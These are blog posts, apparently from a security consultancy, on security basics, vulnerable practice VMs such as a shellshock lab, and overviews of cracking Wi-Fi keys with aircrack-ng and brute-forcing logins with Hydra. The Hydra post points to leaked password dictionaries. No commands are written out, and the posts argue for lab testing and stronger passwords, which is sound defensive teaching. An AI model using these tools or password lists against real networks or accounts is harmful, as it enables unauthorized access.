We Must Master The Cybersecurity Basics

A great SECINT (Security Intelligence) paper John Stewart wrote:

http://www.cisco.com/web/about/security/intelligence/JNS_TTPs.pdf

advancedtechniquestacticsprocedures

 

Basics must be mastered:

  • patching
  • Identity: Strong identity, federated Identity, and identity based networking
  • Eliminate dark space

Notice that the basic #1 item is  patching.  We must be able to cover patching on a timely basis with a regular methodology. Otherwise our systems are an easy target.  we discuss this many times – A hacker performs VA – Vulnerability Analysis  (of the SVAPE&C  explanation)

Identity:  means authentication which Mr. Stewart has broken down into Strong identity, Identity based networking and federated identity.

This topic is a bit more complicated with two-factor authentication not being so easy to set up, but if you want to make it extra difficult for attackers to gain access to your computer systems this is a good place to increase in security. especially as we try to access with our smartphones and mobile devices all the files that we can access with desktops.

 

Eliminating  dark space is an interesting

I think defining dark space will give an idea of  what one can do to work on making more space “white”

Dark space is defined as the inverse of what systems and devices are viewable on the network.

This means that if you do a network scan and a device does not reply but is still on the network at a time that you do not scan the network. Or if you try to scan devices but cannot due to a specific segment being blocked.  Special circumstances create dark spaces, and Security needs to uncover as many as possible within a reasonable timespan.

 

 

 

 

 

 

Testing System Vulnerabilities

It would be a good idea to test your system hacking skills on systems that are not production systems.

But who has time to create systems with a few vulnerabilities?

Well it is vulnhub.com

bwappvmwaresystem

Here is Bwapp which you can download which is actually a vmware instance of a vulnerable application which can be “test” attacked.

 

Also  like the following:

shellshock-lab

This system has a shellshock vulnerability and is very easy to hack (I can copy the /etc/passwd and /etc/shadow/ file right off the system without a userid).

 

Better to test your hacking skills on these types of platforms rather than live systems which could affect people running their day-to-day operations.

 

Contact Us if you need help in setting up a test lab.

 

Talking Cybersecurity like strategy discussion for Rock-Paper-Scissors

2000px-Rock-paper-scissors.svg-wikipedia  From Wikipedia.

 

The problem is, Cybersecurity seems easy to those of us in the Security field (just like the above game) but yet the strategy is hard when we try to explain to an Executive immersed in their regular world. Cyberstrategy is also not so cut and dried.

The hackers are attacking old vulnerabilities because people are not patching their computers.

Yet, even if a user patches a computer and they click on a phishing email the computer is still hacked.

So what happens when a password is guessed or stolen from a breached website, where the user entered the password and was reused?  Now the hacker can access the network with your credentials.

 

If the hacker can access your network logon with your credentials that’s like winning every time at rock paper scissors, since you can see the response before you place your hand gesture.

 

Then on top of all that – what about Zero-day attacks? or Forever day attacks – where the hacker can hack forever on a particular platform until the problem is solved (assuming it can be).

 

No wonder a lot of people are tuning us security folks out for the most part:

 

advancedstrategiesfordefending

 

The Cisco VP and Chief architect Martin Roesch: http://www.rsaconference.com/media/advanced-strategies-for-defending-against-a-new-breed-of-attacks

 

From the image:

Even the basics are not covered

Less than half of security practitioners leverage critical security tools

Security Administration and provisioning  43%

patching and configuration     38%

pentesting        29%

Quarantine malicious apps 55%

 

 

Secops is not just selling new devices from Cisco, it is just doing the basics, doing the patching, creating good password training, training for security is a difficulty of attention and focus.

Everyone wants to do their regular projects not security projects. People do not want to remember difficult passwords, or change passwords every 60 days.

Us in security have to be cognizant of the “regular” world.

We have to do the basics, because although we won’t be 100% secure (which can’t be done) we can make things better and much harder for the hacker – which is what a good cybersecurity program should do.

 

The key of course is to have the personnel which has the ability to make the decisions even when everything is going on – focus and commitment. communicating this is just as important as well.

 

advancedstrategiesdefendingbreedofattacks

How-To Hack Wifi: Testing Defenses

Hacking Wifi is useful since we want to test our defenses, to make sure we have a certain level of defense set up.

Aircrak-ng is used to crack the Wifi encryption that is available on Kali Linux Operating system (the operating system built for pentesters/ethical hackers)

aircracksnippet

As in this tutorial by WonderHowTo there is a few steps one has to perform before capturing data from the targeted Wifi Access point.

 

First one has to set up a Wifi card that is accessible by airodump-ng for the aircrank-ng process attempt to crack the WEP or WPA password key of the Access point to be tested.

Aircrack-ng is the primary application with the aircrack-ng suite, which is used for password cracking. It’s capable of using statistical techniques to crack WEP and dictionary cracks for WPA and WPA2 after capturing the WPA handshake.”

One then accumulates a certain level of data before trying to crack the code.

There are several other tools in the Aircrack-ng toolset:

 

Aireplay-ng – it can generate or accelerate traffic on the Access point, potentiall run WEP and WPA2 password attacks as well as ARP injection.

Airdecap-ng – decrypt wireless traffic once the key is cracked

Airtun-ng – virtual tunnel interface creator

Airolib-ng – stores or manages ESSIDs to help crack the password cracking.

Airbase-ng can make the laptop/computer into an Access point.

The reason one wants to spend time testing defenses is that Wifi tends to be set up and then forgotten, and if it was set up incorrectly then it should be fixed.

We  at Fixvirus.com have a WifiService: Psi service

just the router

An old Wifi Linksys router

Hydra Tool Can Crack Your Online Passwords

Here is a website link that discusses Hydra trying to crack online passwords at websites:

http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html

The tool can attack (and iterate)  through a set amount of dictionary passwords to ssh and ftp server accounts very easily (without any extra configuration)

If there are website forms that have usernames and passwords (like WordPress or Joomla or other CMS(Content Management Systems)

 

There is a better web blog explaining what Hydra does and a successful sample attack:

http://cs337-unyunizer.blogspot.com/

hydrasnippetfromattack

The snippet is from the cs337-unyunizer.blogspot.com webpage

All the white responses are the attempts at hacking, while the green text response was the successful attack with the correct password.

 

So this tool makes finding a password easy to set up, the hard part of course is finding a good dictionary list of words to attack the username password  (this is also called brute-force password attack)

 

Interesting to note, but if CAPTCHA is implemented well, this method will not work at all.

So let’s say one is a criminal hacker, the key is to find a good password file (from known passwords on the internet) there are likely files out there which allow the criminal to amass a decent password file, which would allow you to attack sites with this password dictionary file. Or one can generate a fgile on their own.

 

A good Google search can start the hacker on the way to building this file.

http://security.stackexchange.com/questions/1376/where-can-i-find-good-dictionaries-for-dictionary-attacks  is an example. of a link.

There is a list of password dictionaries at this site https://wiki.skullsecurity.org/Passwords . There are some lists that were used by the Conficker worm to spread.

As well as some leaked passwords (like from Sony etc. that have been compiled here.

So you can see it is a relatively straight forward method to try and go after online websites that have username and passwords.

Why am I saying this?  Because we ahve to become better at making passwords, change your passwords, make them longer and use less known words combinations with numbers and special characters. And the longer the better, to the tune of 10-20 letters.

 

Check this xkcd comic:  http://xkcd.com/936/  Tries to show pictorally that it is better to run together several words rather than using difficult combinations that cannot be remembered.